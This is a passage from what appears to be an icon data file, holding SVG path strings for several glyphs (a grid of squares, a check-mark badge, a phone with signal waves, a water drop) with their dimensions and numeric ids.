8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16zm16-96l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16zm64 96c0-8.8 7.2-16 16-16l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16zm16-96l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16zm64 96c0-8.8 7.2-16 16-16l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16zm16-96l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16z",{"w":380,"h":380,"d":19656},"M256 0c35.9 0 67.8 17 88.1 43.4 33-4.3 67.6 6.2 93 31.6s35.9 60 31.6 93C495 188.2 512 220.1 512 256s-17 67.8-43.4 88.1c4.3 33-6.2 67.6-31.6 93s-60 35.9-93 31.6C323.8 495 291.9 512 256 512s-67.8-17-88.1-43.4c-33 4.3-67.6-6.2-93-31.6s-35.9-60-31.6-93C17 323.8 0 291.9 0 256s17-67.8 43.4-88.1c-4.3-33 6.2-67.6 31.6-93s60-35.9 93-31.6C188.2 17 220.1 0 256 0zm0 48c-24.1 0-45.1 13.6-55.7 33.6-5.4 10.2-17.3 15.1-28.2 11.7-21.6-6.6-46.1-1.4-63.1 15.7S86.6 150.4 93.2 172c3.4 11-1.5 22.9-11.7 28.2-20 10.6-33.6 31.6-33.6 55.7s13.6 45.1 33.6 55.7c10.2 5.4 15.1 17.3 11.7 28.2-6.6 21.6-1.4 46.1 15.7 63.1s41.5 22.3 63.1 15.7c11-3.4 22.9 1.5 28.2 11.7 10.6 20 31.6 33.6 55.7 33.6s45.1-13.6 55.7-33.6c5.4-10.2 17.3-15.1 28.2-11.7 21.6 6.6 46 1.4 63.1-15.7 17-17 22.3-41.5 15.7-63.1-3.4-11 1.5-22.9 11.7-28.2 20-10.6 33.6-31.6 33.6-55.7s-13.6-45.1-33.6-55.7c-10.2-5.4-15.1-17.3-11.7-28.2 6.6-21.6 1.4-46.1-15.7-63.1S361.6 86.6 340 93.2c-11 3.4-22.9-1.5-28.2-11.7-10.6-20-31.6-33.6-55.7-33.6zm57.4 121.9c7.8-10.7 22.8-13.1 33.5-5.3s13.1 22.8 5.3 33.5L249.8 338.9c-4.2 5.7-10.7 9.4-17.8 9.8s-14-2.2-18.9-7.3l-46.4-48c-9.2-9.5-9-24.7 .6-33.9s24.7-8.9 33.9 .6l26.5 27.4 85.6-117.7z",{"w":395,"h":380,"d":19658},"M344-32c-13.3 0-24 10.7-24 24s10.7 24 24 24c101.6 0 184 82.4 184 184 0 13.3 10.7 24 24 24s24-10.7 24-24C576 71.9 472.1-32 344-32zm8 256a32 32 0 1 0 0-64 32 32 0 1 0 0 64zM320 88c0 13.3 10.7 24 24 24 48.6 0 88 39.4 88 88 0 13.3 10.7 24 24 24s24-10.7 24-24c0-75.1-60.9-136-136-136-13.3 0-24 10.7-24 24zM213.6 40.9c-11.9-26.2-41.6-39.1-68.9-30-62.3 20.8-116.2 83.7-102.6 160.9 30.6 173.7 156.5 299.6 330.2 330.2 77.2 13.6 140.1-40.4 160.9-102.6 9.1-27.3-3.9-57-30-68.9l-87.3-39.7c-23.4-10.6-51-4-67.1 16l-21.2 26.6c-48.9-27.3-88.9-68.8-114.4-118.8l24.2-19.3c20.1-16.1 26.7-43.7 16-67.1L213.6 40.9zM159.9 56.4c4-1.3 8.3 .6 10 4.4L209.6 148c1.5 3.4 .6 7.4-2.3 9.7l-38.9 31.1c-8.4 6.8-11.3 18.3-7 28.2 31.9 73.9 89.9 133.8 162.4 168.2 10.1 4.8 22.1 2 29-6.7l33.5-41.9c2.3-2.9 6.3-3.9 9.7-2.3l87.3 39.7c3.8 1.7 5.7 6 4.4 10-15.1 45.3-58.6 79.1-107 70.5-153.8-27.1-264.1-137.4-291.2-291.3-8.5-48.4 25.3-91.9 70.5-107z",{"w":398,"h":380,"d":19660},"M192 464c-79.5 0-144-64.5-144-144 0-13.2 5.2-34.6 17.2-63.7 11.6-28 27.9-58.9 45.8-89.5 28.7-48.9 60.3-94.8 80.9-123.6 20.6 28.8 52.3 74.7 80.9 123.6 18 30.6 34.2 61.5 45.8 89.5 12.1 29.1 17.2 50.5 17.2 63.7 0 79.5-64.5 144-144 144zM0 320C0 426 86 512 192 512s192-86 192-192c0-91.2-130.2-274.1-166.6-323.5-5.9-8-15.2-12.5-25.2-12.5l-.4 0C181.8-16 172.5-11.5 166.6-3.5 130.2 45.9 0 228.8 0 320zm144 0c0-13.3-10.7-24-24-24s-24 10.7-24 24c0 53 43 96 96 96 13.3 0 24-10.7 24-24s-10.7-24-24-24c-26.5 0-48-21.5-48-48z",{"w":379,"h":380,"d":19662},"M280.4 48c-3.2 0-6.3 .5-9.3 1.4L206.6 69.2C136.1 90.9 88 156.1 88 229.8l0 42.9c22.7 3.8 40 23.6 40 47.3l0 144c0 26.5-21.5 48-48 48l-32 0c-26.5 0-48-21.5-48-48L0 320c0-23.8 17.3-43.5 40-47.3l0-42.9C40 135 101.8 51.2 192.5 23.4L256.9 3.5c7.6-2.3 15.5-3.5 23.4-3.5 44 0 79.6 35.7 79.6 79.6l0 56.4c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-56.4C312 62.2 297.8 48 280.4 48zM48 320l0 144 32 0 0-144-32 0zm208 24c0-71.6 55.6-127.8 89-148.1 4.3-2.6 9.6-2.6 14 0 33.5 20.3 89 76.6 89 148.1 0 32-16 80-64 112l27.3 27.3c3 3 4.7 7.1 4.7 11.3l0 1.4c0 8.8-7.2 16-16 16l-96 0c-8.8 0-16-7.2-16-16l0-1.4c0-4.2 1.7-8.3 4.7-11.3L320 456c-48-32-64-80-64-112zm128-32a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",1790693850555]